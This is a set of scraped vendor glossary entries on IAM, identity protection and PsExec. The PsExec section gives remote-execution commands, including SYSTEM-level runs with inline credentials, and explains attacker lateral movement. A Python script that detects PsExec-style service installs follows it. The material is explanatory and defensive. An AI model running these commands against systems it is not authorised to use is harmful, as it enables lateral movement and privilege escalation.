| Control and Customization | Limited customization options | Full control over customization and policies |
| Data Sovereignty | Data stored on CSP's infrastructure | Complete control over data within the premises |
| Legacy System Integration | May have limitations with legacy systems | Better compatibility with on-premises systems |
| Security Control | CSP-managed security measures | Direct control over security measures |
| Compliance Considerations | Compliance with CSP's certifications | Enhanced control and visibility for compliance |

It's important to note that both Cloud IAM and On-Premises IAM have their own security considerations, such as data privacy, network connectivity, and authentication mechanisms. Organizations should evaluate their specific needs, risk appetite, budget, and regulatory requirements when deciding between Cloud IAM and On-Premises IAM. Hybrid IAM solutions that combine both cloud and on-premises components may also be viable options to meet specific organizational needs.

### Benefits of implementing IAM in your organization...
---

- Published: 2023-01-17
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/identity-protection/

Measures and proactive monitoring aimed at safeguarding individuals' personal data and accounts from theft, fraud, or unauthorized use.

Identity protection refers to safeguarding one's personal information and identity from theft or fraud. It involves proactively monitoring for signs of identity theft as well as taking measures to minimize risks. As cyber threats continue to pose a danger to both businesses and individuals, identity protection has become an increasingly critical component of cybersecurity strategies. Protecting personally identifiable information and accounts from unauthorized access is essential in today's digital world. For professionals tasked with safeguarding sensitive data and systems, developing a comprehensive identity protection plan is key.

### Why Is Identity Protection Important?

Protecting one's identity has become increasingly important in today's digital world. Identity theft and fraud are serious cybercrimes that can have devastating financial and emotional consequences on victims. Organizations also need to prioritize identity protection to safeguard sensitive customer data and maintain trust. There are several reasons why identity protection is crucial:

Financial loss. Identity thieves steal personal information like Social Security numbers, bank account numbers, and credit card numbers to open fraudulent accounts and make unauthorized purchases in the victim's name. This can lead to substantial financial loss and damage credit scores.

Privacy concerns. Once personal data has been compromised, it can be difficult to contain and recover. Criminals may use the information for malicious purposes like stalking, harassment, or blackmail. They can also sell sensitive data on the dark web.

Reputational harm. If an organization experiences a data breach, it can seriously damage customer trust and loyalty.
The organization may face legal consequences and loss of business as well. Strict identity protection policies and controls must be in place to mitigate these risks.

Security risks. Poor identity protection practices pose a threat to both individuals and organizations. Identifying and addressing vulnerabilities in systems and processes is key to reducing risks like hacking, malware infections, and insider threats. Continuous monitoring and testing are required.

### Identity Protection vs Identity Security

In the realm of cybersecurity, "Identity Protection" focuses on safeguarding personal identity information from unauthorized access and misuse. It encompasses measures like monitoring personal data, alerting users to potential fraud, and providing recovery services in case of identity theft. Essentially, it aims to detect and mitigate the damage from identity-related fraud by employing tools such as credit monitoring, fraud alerts, and identity theft insurance.

On the other hand, "Identity Security" deals with managing and securing digital identities to ensure that access to resources is correctly granted. This broader approach involves implementing technologies such as Identity and Access Management (IAM) systems, Multi-Factor Authentication (MFA), Single Sign-On (SSO), and Role-Based Access Control (RBAC). These tools help manage user roles and access privileges, secure access to systems and data, and protect them against unauthorized use.

### Common Types of Identity Theft

#### Phishing

Phishing refers to fraudulent emails, texts, or phone calls that appear legitimate but are designed to steal sensitive data like account numbers, passwords, or Social Security numbers. Phishing messages often pose as a trustworthy company or website to trick recipients into clicking malicious links, downloading infected attachments, or providing private information.
#### Identity Theft

Identity theft occurs when someone steals your personal information like your full name, Social Security number, date of birth, and address to impersonate you for financial gain. Thieves may use your identity to open new accounts, file for loans, commit tax fraud, or access your existing accounts. Identity theft can damage your credit and finances if not detected early. Monitor accounts regularly for unauthorized activity and check your credit report annually.

#### Account Takeover

An account takeover happens when cybercriminals gain access to your online accounts like email, social media, or banking. Criminals obtain account access through phishing, malware, or by purchasing stolen login credentials on the dark web. Once inside an account, thieves can lock you out, send spam, steal data, commit fraud, or hold accounts for ransom. Use strong, unique passwords for accounts and two-factor authentication when available to help prevent account takeovers.

#### Malicious Remote Connection

This form of cyber attack involves unauthorized remote access to a corporate network. Attackers may exploit vulnerabilities in remote access systems like Virtual Private Networks (VPNs) or Zero Trust Network Access (ZTNA) to gain entry. Once inside the network, they can access sensitive corporate data, deploy malware, or conduct espionage. This type of breach is particularly dangerous because it allows attackers to operate within a network as if they were legitimate users. It's crucial for organizations to secure remote access systems with strong authentication measures and continuous monitoring for unusual activities.

#### Lateral Movement

A threat actor follows up on an initial endpoint compromise by accessing additional workstations and servers with compromised domain credentials. Another flavor of lateral movement is to extract credentials for SaaS apps or cloud workloads from the compromised endpoints and pivot from the initial on-prem foothold to the cloud environment.
#### Credit Card Fraud

Credit card fraud refers to the unauthorized use of your credit card information to make purchases. Criminals obtain card numbers through skimmers at payment terminals, hacking online retailers, or buying stolen cards on cybercrime forums. Fraudsters then use the card information to shop online or create physical counterfeit cards. Regularly monitor statements for unauthorized charges and report any fraud immediately to limit liability and prevent further misuse of your accounts.

### Warning Signs Your Identity Has Been Stolen

Once a person's identity has been stolen, there are several warning signs that may alert the victim. Recognizing these signs quickly can help limit the damage.

#### Suspicious Activity in Financial Accounts

Unauthorized transactions, new accounts opened in one's name, and sudden changes in account balances can indicate identity theft. Criminals may use stolen personal information to access existing accounts or open new lines of credit. Regularly monitoring financial statements and account activity is crucial.

#### Bills or Collection Notices for Unknown Debt

Receiving bills, collection notices or calls about unknown charges, accounts or loans is a major red flag. Identity thieves will sometimes open accounts or file for loans in the victim's name and default on payments. Checking one's credit report regularly helps detect fraudulent accounts or charges before they damage one's credit.

#### Denied Credit for No Apparent Reason

If credit applications are suddenly denied when one's credit was previously in good standing, it may indicate identity theft. Thieves may have accessed accounts, defaulted on payments or committed other credit fraud that lowers the victim's credit score. Obtaining a free credit report allows one to check for errors or unauthorized activity.
#### Tax Return Rejected

Having one's tax return rejected by the IRS due to a return already filed under one's Social Security number is a sign that an identity thief may have used that information to commit tax fraud or claim a fraudulent refund. Filing a police report and contacting the IRS immediately can help resolve the issue and prevent further fraud.

#### Unfamiliar Mail

Receiving pre-approved credit offers, bills, or other mail for unknown accounts or in one's name at an unfamiliar address may indicate identity theft. Criminals will sometimes use stolen personal information to open accounts or file a change of address to divert the victim's mail. Reporting such suspicious mail or a false change of address to the USPS and checking one's credit report are important steps to take.

By staying vigilant for these common warning signs, individuals and businesses can detect identity theft early and take action to limit negative consequences. Monitoring accounts and reports regularly, filing reports with the relevant agencies, and considering identity theft protection services are some of the most effective methods for identifying and addressing identity fraud.

### Best Practices for Identity Protection

To properly protect one's identity, several best practices should be followed. These precautions help safeguard sensitive personal information and reduce the risks of identity theft.

#### Monitor Accounts and Credit Reports Regularly

It is recommended that individuals check bank statements, credit card statements, and credit reports regularly for any unauthorized activity. Early detection of fraud is critical to limiting damage. Credit reports from the three major credit bureaus should be checked at least once a year for inaccuracies or signs of fraud.

#### Use Strong and Unique Passwords

Creating strong, complex passwords that are different for each account is one of the best ways to protect online identities.
Passwords should be at least 8-12 characters and contain a mix of letters, numbers and symbols. Using a password manager can help generate and remember complex, unique passwords for all accounts.

### Enable Two-Factor Authentication When Available

Two-factor authentication, or 2FA, adds an extra layer of security for online accounts. It requires not only a password but also another piece of information, such as a security code sent to your phone. 2FA helps prevent unauthorized access even if account credentials are compromised. It should be enabled for email, banking, social media, and any other accounts that offer it.

### Be Cautious of Phishing and Malware

Phishing emails and malicious software are common ways for cybercriminals to steal personal data and financial information. Individuals should be wary of unsolicited requests for sensitive data or account information. Links and downloads from unknown or untrusted sources should also be avoided. Security software should be used to help detect and block malware.

### Monitor Mail and Bills Regularly

Undelivered or missing mail could indicate that an identity thief has created accounts or submitted change-of-address forms to redirect information. Individuals should watch for bills, statements and other correspondence that do not arrive as expected. This can alert you early to identity theft, giving you time to take action to limit the damage.

### Be Careful with Tax Returns and Refunds

Fraudsters frequently target tax returns and refunds. File tax returns as early as possible to avoid having an identity thief file a fake return to claim your refund. Monitor IRS and state tax board accounts for any signs of fraud. Be cautious of unsolicited communications claiming tax issues that require immediate action or payment. Legitimate agencies will not request sensitive data via phone, email or text.

## Essential Identity Protection Strategies

To properly protect one's identity, several essential strategies should be employed.
These include monitoring accounts and credit reports regularly, using strong and unique passwords, enabling two-factor authentication whenever possible, and being cautious of phishing emails and malicious links.

### Monitor Accounts and Credit Reports

It is critical to routinely check financial accounts, credit reports, and credit scores for any unauthorized activity. Experts recommend monitoring accounts and credit reports at least once a month, and checking credit scores every few months. Some services offer free credit reports, credit scores, and credit monitoring. Identity theft often goes undetected for some time, so consistent monitoring is key.

### Use Strong, Unique Passwords

Passwords are the first line of defense for online accounts. Reusing the same password across sites puts individuals at major risk. Strong, unique passwords should be used for all accounts. A password manager can help generate and remember complex, unique passwords. Enable two-factor authentication on accounts whenever available for an extra layer of security.

### Enable Two-Factor Authentication

Two-factor authentication, also known as 2FA, adds an additional layer of security for online accounts. It requires not only a password but also another piece of information, such as a security code sent to one's phone. Enable 2FA on all accounts that offer it, including email, banking, social media, and any other online services. SMS text messages, authentication apps, and security keys are all options for the second factor.

### Be Cautious of Phishing and Malware

Phishing emails and malicious websites are common ways for cybercriminals to steal personal information or install malware. Be wary of unsolicited requests for sensitive data or account information. Never click links or download attachments from unknown or untrusted sources. Phishing emails are often designed to appear legitimate but contain links to malicious sites. Staying vigilant and cautious can help prevent identity theft and account takeovers.
Following these essential strategies consistently and diligently can significantly reduce the risk of identity theft and account compromise. While no approach is 100% foolproof, monitoring accounts and credit reports regularly, using strong unique passwords, enabling two-factor authentication, and being cautious of phishing and malware can help individuals maintain a...

---

- Published: 2023-01-17
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/psexec/

A Windows command-line tool used for executing processes on remote systems, commonly leveraged by attackers for lateral movement and remote code execution in network breaches.

PsExec is a command-line tool that allows users to run programs on remote systems. It can be used to execute remote commands, scripts, and applications on remote systems, as well as to launch GUI-based applications there. PsExec uses the Microsoft Windows Service Control Manager (SCM) to start an instance of its service on the remote system, which lets the tool run the specified command or application with the privileges of the service account on the remote system. To establish the connection, the remote user must have access privileges to the target machine and provide the name of the target machine together with a username and password, in the following format:

`PsExec -s \\MACHINE-NAME -u USERNAME -p PASSWORD COMMAND`

where COMMAND is the process to be executed once the connection is established.

## What is PsExec used for?

PsExec is a powerful command-line tool used primarily for remote administration and execution of processes on Windows systems. It allows system administrators and security professionals to execute commands or run programs on remote computers in a networked environment. Here are some common use cases for PsExec:

- Remote System Administration: PsExec enables administrators to remotely manage and administer multiple Windows systems without the need for physical access.
  It allows them to execute commands, run scripts, install software, modify system configurations, and perform various administrative tasks on remote machines from a central location.
- Software Deployment and Updates: With PsExec, administrators can remotely deploy software packages, patches, or updates across multiple computers simultaneously. This feature is particularly useful in large-scale environments where manual installation on individual systems would be time-consuming and impractical.
- Troubleshooting and Diagnostics: PsExec can be used to remotely diagnose and troubleshoot system issues. Administrators can execute diagnostic tools, access event logs, retrieve system information, or run troubleshooting scripts on remote systems to identify and resolve problems without being physically present.
- Security Auditing and Patch Management: Security professionals often employ PsExec to conduct security audits, vulnerability assessments, or penetration testing exercises. It allows them to remotely execute security scanning tools, verify patch levels, and assess the security posture of remote systems within the network.
- Incident Response and Forensics: During incident response investigations, PsExec aids in remotely accessing compromised systems for analysis and evidence gathering. It allows security analysts to execute commands or run forensics tools on compromised machines without directly interacting with them, minimizing the risk of further compromise or data loss.
- Red Teaming and Lateral Movement: In red teaming exercises, where organizations simulate real-world attacks to test their security defenses, PsExec is often used for lateral movement within the network. Attackers can use PsExec to execute commands or run malicious payloads on compromised systems, moving laterally and escalating privileges to gain unauthorized access to sensitive resources.
- Automation and Scripting: PsExec can be integrated into scripts or batch files, enabling automation of repetitive tasks across multiple systems. It provides a means to execute scripts remotely, allowing administrators to orchestrate complex operations or perform regular maintenance tasks efficiently.

However, it's important to note that PsExec can be a powerful tool in the hands of attackers as well, since it allows them to execute arbitrary code on remote systems, potentially leading to privilege escalation and lateral movement in the network. Therefore, it is important to use PsExec securely and to limit its use to trusted users and systems.

## How to Install and Set Up PsExec

Installing and setting up PsExec is a straightforward process that involves the following steps:

### Downloading PsExec

To install PsExec, visit the official Microsoft website or a trusted software repository to download the PsExec executable file. Ensure that you download it from a reliable source to avoid any security risks or malware.

### Installing PsExec

PsExec does not require a formal installation process. Once you have downloaded the PsExec executable file, you can save it to a directory of your choice on your local system. It is recommended to place it in a location that is easily accessible and included in the system's PATH environment variable for convenient usage.

### Running PsExec and Connecting to a Remote Computer

To connect to a remote computer using PsExec, follow these steps:

- a. Open a command prompt or terminal on your local system.
- b. Navigate to the directory where you saved the PsExec executable file.
- c. To establish a connection with a remote computer, use the following command:

  `psexec \\remote_computer_name_or_IP -u username -p password command`

  Replace "remote_computer_name_or_IP" with the name or IP address of the remote computer you want to connect to.
  Replace "username" and "password" with the credentials of an account on the remote computer that has the necessary permissions for the desired operations. Specify the command you want to execute on the remote computer.
- d. Press Enter to execute the command. PsExec will establish a connection with the remote computer, authenticate using the provided credentials, and execute the specified command remotely.
- e. You will see the output of the executed command in your local command prompt or terminal window.

It's important to note that successfully connecting and executing commands with PsExec depends on network connectivity between your local system and the remote computer, as well as on correct authentication credentials and permissions on the remote system.

## What are the most common PsExec commands?

PsExec offers several commonly used commands that provide administrators with powerful remote execution capabilities. Here are some of the most common PsExec commands and their functions:

- `PsExec \\remote_computer command`: Executes the specified command on the remote computer. Enables administrators to run commands or launch programs remotely.
- `PsExec \\remote_computer -s command`: Executes the specified command with system-level privileges on the remote computer. Useful for running commands that require elevated privileges or access to system resources.
- `PsExec \\remote_computer -u username -p password command`: Executes the specified command on the remote computer using the provided username and password for authentication. Allows administrators to run commands with specific user credentials on remote systems.
- `PsExec \\remote_computer -c -f -s -d command`: Copies the specified executable file to the remote computer and executes it with system-level privileges, in the background, without waiting for it to complete. Useful for deploying and running programs on remote systems without user interaction.
- `PsExec \\remote_computer -i session_id -d -s command`: Executes the specified command in an interactive session with system-level privileges on the remote computer. Helpful for running commands that require interaction or access to the graphical user interface of the remote system.
- `PsExec \\remote_computer -accepteula -s -c -f script.bat`: Copies the specified script file to the remote computer, executes it with system-level privileges, and waits for it to complete. Allows administrators to remotely execute scripts for automation or administrative tasks.

These commands represent a subset of the available PsExec commands, each serving a specific purpose in remote administration and execution.

The syntax for PsExec commands is:

- `psexec \\computer command`
- `psexec @run_file command`

PsExec command line options:

| Option | Explanation |
| --- | --- |
| `\\computer` | The remote computer to connect to. Use `\\*` for all computers in the domain. |
| `@run_file` | Run the command against the computers listed in the specified text file. |
| `command` | Program to execute on the remote system. |
| `arguments` | Arguments to pass to the remote program. Use absolute paths. |
| `-a` | Set CPU affinity. Comma-separate CPU numbers starting at 1. |
| `-c` | Copy the local program to the remote system before executing. |
| `-f` | Force copy over an existing remote file. |
| `-v` | Only copy if the local program is a newer version than the remote one. |
| `-d` | Don't wait for the remote program to finish. |
| `-e` | Don't load the user profile. |
| `-i` | Interact with the remote desktop. |
| `-l` | Run with limited user rights (Users group). |
| `-n` | Connection timeout in seconds. |
| `-p` | Specify the password for the user. |
| `-r` | Name of the remote service to interact with. |
| `-s` | Run under the SYSTEM account. |
| `-u` | Specify the username for login. |
| `-w` | Set the working directory on the remote system. |
| `-x` | Display UI on the Winlogon desktop. |
| `-low` | Run at low priority. |
| `-accepteula` | Suppress the EULA dialog. |

## Is PsExec PowerShell?

PsExec is not PowerShell. It is a command-line tool that allows users to run programs on remote systems.
PowerShell, on the other hand, is a task automation and configuration management framework developed by Microsoft, which includes a command-line shell and an associated scripting language built on the .NET Framework. PowerShell can be used to automate various tasks and perform complex operations on local or remote systems. While both PsExec and PowerShell can be used to perform similar tasks, such as running commands on remote systems, they are different tools with different capabilities. PsExec is designed to execute a single command or application on a remote system, while PowerShell is a more powerful framework that can be used to automate and manage various tasks, including running commands and scripts on remote systems. Therefore, depending on the scenario, one tool may be more appropriate than the other.

## How PsExec Works

PsExec works by leveraging its architecture and communication protocols to enable remote execution on Windows systems. Let's explore the key aspects of how PsExec operates:

### Architecture and Communication

PsExec follows a client-server architecture. The client-side component, executed on the local system, establishes a connection with the server-side component running on the remote system. This connection enables the transmission of commands and data between the two systems. PsExec uses the Server Message Block (SMB) protocol, specifically the SMB file sharing and named pipe mechanisms, to establish communication channels with remote systems. This allows for secure and reliable communication between the client and server components.

### Authentication and Security

PsExec employs authentication mechanisms to ensure secure access to remote systems. It supports various authentication methods, including a username and password, or authentication via NTLM (NT LAN Manager) or Kerberos. To enhance security, it is crucial to follow best practices for authentication when using PsExec.
These practices include using strong and unique passwords, implementing multi-factor authentication where possible, and adhering to the principle of least privilege by granting only the necessary permissions to PsExec users.

### File and Registry Access

PsExec facilitates file and registry access on remote systems, allowing administrators to perform tasks such as copying files, executing scripts, or modifying registry settings. When executing commands remotely, PsExec temporarily copies the required executable or script to the remote system's temporary directory before execution. It is important to keep security considerations in mind when using PsExec for file and registry operations. For example, administrators should exercise caution when transferring sensitive files and ensure that appropriate access controls are in place to prevent unauthorized access to or modification of critical system files and registry entries.

## Is PsExec malware?

PsExec is not malware itself, but it can be used by malware and attackers to perform malicious actions. PsExec is a legitimate tool that allows users to run programs on remote systems. It can be used for a variety of legitimate tasks such as troubleshooting, deploying software updates and patches, and executing commands and scripts on multiple systems simultaneously. However, PsExec can also be used by attackers to gain unauthorized access to remote systems and perform malicious actions. For example, an attacker could use PsExec to execute a malicious payload on a remote system, or to move laterally within a network and gain access to sensitive information. Therefore, it's important to use PsExec securely and to limit its use to trusted users and systems.

## How is PsExec Used in Cyberattacks?

The seamless remote access PsExec enables from a source machine to a target machine is intensively abused by threat actors during the lateral movement stage of cyberattacks.
This would typically occur after the initial compromise of a patient-zero machine. From that point onward, attackers seek to expand their presence within the environment and reach either domain dominance or the specific data they are after. PsExec provides them with a seamless and reliable way to achieve that, for the following reasons.

### How can adversaries use PsExec together with compromised credentials?

By combining compromised user credentials with PsExec, adversaries can bypass authentication mechanisms, gain access to multiple systems, and potentially compromise a significant portion of the network. This approach enables them to move laterally, escalate privileges, and carry out their malicious objectives with a broader impact.

### What makes PsExec a tool of choice for lateral movement attacks?

PsExec is often considered a "living off the land" tool of choice...
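One way a defender can turn the mechanism described under "How PsExec Works" into detection logic, as an added example that is not Silverfort's or Sysinternals' code: PsExec copies its service binary (PSEXESVC.exe, unless the service is renamed with the `-r` option from the table above) to the target's ADMIN$ share and has the Service Control Manager install and start it, so the target host records a write to ADMIN$ (Security event 5145, which is only logged when the "Audit Detailed File Share" subcategory is enabled) followed by a new service installation (System event 7045). The script correlates those two records, so a service renamed with `-r` is still caught. The event records are constructed samples; the envicing keys `time`, `host`, `id` and `ip` and the 60-second window are assumptions of this example, while `ShareName`, `RelativeTargetName`, `AccessMask`, `ServiceName` and `ImagePath` are the real data field names of those events.

```python
"""Detect PsExec-style remote service execution from Windows event records.

Added example for this glossary entry; not Silverfort's or Sysinternals' code.
It correlates two target-side artifacts of the mechanism the entry describes:

  * Security event 5145 (detailed file share access): a write to the ADMIN$
    share, i.e. the service binary arriving over SMB.
  * System event 7045 (Service Control Manager): a new service installed.

All events below are constructed samples, not real telemetry. ShareName,
RelativeTargetName, AccessMask, ServiceName and ImagePath are the real event
data field names; "time", "host", "id" and "ip" are assumed envelope keys.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List, Optional
import ntpath

DEFAULT_SERVICE = "PSEXESVC"        # service and binary name PsExec uses unless -r is given
CORRELATION_WINDOW = timedelta(seconds=60)   # assumed: drop-to-install gap worth correlating
FILE_WRITE_DATA = 0x2               # AccessMask bit set when a file is written to the share

SAMPLE_EVENTS = [
    # 1) default run: PSEXESVC.exe written to ADMIN$, then service PSEXESVC installed
    {"time": "2024-05-01T10:00:00", "host": "FS01", "id": 5145, "ip": "10.0.0.5",
     "ShareName": r"\\*\ADMIN$", "RelativeTargetName": "PSEXESVC.exe", "AccessMask": "0x2"},
    {"time": "2024-05-01T10:00:01", "host": "FS01", "id": 7045,
     "ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    # 2) service renamed with -r: the name no longer matches, but the same
    #    write-to-ADMIN$-then-install sequence occurs
    {"time": "2024-05-01T11:30:00", "host": "WS07", "id": 5145, "ip": "10.0.0.5",
     "ShareName": r"\\*\ADMIN$", "RelativeTargetName": "mgmtsvc.exe", "AccessMask": "0x2"},
    {"time": "2024-05-01T11:30:02", "host": "WS07", "id": 7045,
     "ServiceName": "mgmtsvc", "ImagePath": r"%SystemRoot%\mgmtsvc.exe"},
    # 3) benign: an installer registering its own service from Program Files
    {"time": "2024-05-01T12:00:00", "host": "WS07", "id": 7045,
     "ServiceName": "BackupAgent", "ImagePath": r'"C:\Program Files\Backup\agent.exe"'},
]


@dataclass
class Finding:
    host: str
    service: str
    image: str
    source_ip: Optional[str]   # taken from the correlated 5145 event when there is one
    reason: str


def event_time(event: dict) -> datetime:
    return datetime.fromisoformat(event["time"])


def binary_name(image_path: str) -> str:
    """Executable file name from a 7045 ImagePath (quotes tolerated, trailing arguments not)."""
    return ntpath.basename(image_path.strip().strip('"')).lower()


def detect_psexec(events: List[dict]) -> List[Finding]:
    """Return one Finding per 7045 service install that looks like PsExec."""
    admin_writes = [e for e in events
                    if e["id"] == 5145
                    and e["ShareName"].upper().endswith("ADMIN$")
                    and int(e["AccessMask"], 16) & FILE_WRITE_DATA]
    findings: List[Finding] = []
    for ev in events:
        if ev["id"] != 7045:
            continue
        exe = binary_name(ev["ImagePath"])
        # the same file name written to this host's ADMIN$ shortly before the install
        drop = next((w for w in admin_writes
                     if w["host"] == ev["host"]
                     and w["RelativeTargetName"].lower() == exe
                     and timedelta(0) <= event_time(ev) - event_time(w) <= CORRELATION_WINDOW),
                    None)
        if ev["ServiceName"].upper() == DEFAULT_SERVICE or exe == DEFAULT_SERVICE.lower() + ".exe":
            reason = "default PsExec service/binary name"
        elif drop is not None:
            reason = "service binary written to ADMIN$ just before install (renamed service, -r style)"
        else:
            continue   # an ordinary service installation
        findings.append(Finding(ev["host"], ev["ServiceName"], ev["ImagePath"],
                                drop["ip"] if drop else None, reason))
    return findings


if __name__ == "__main__":
    for f in detect_psexec(SAMPLE_EVENTS):
        print(f"{f.host}: service '{f.service}' ({f.image}) "
              f"from {f.source_ip or 'unknown source'}: {f.reason}")
```

Run as a script it reports the two suspicious installs and ignores the BackupAgent service, because nothing was written to ADMIN$ under that file name beforehand. The default-name match fires even without a 5145 record (it then carries no source address), so enabling detailed file share auditing mainly buys the source IP and the renamed-service case; fed from a SIEM, one source address writing to ADMIN$ on many hosts within minutes is the lateral movement pattern the entry describes.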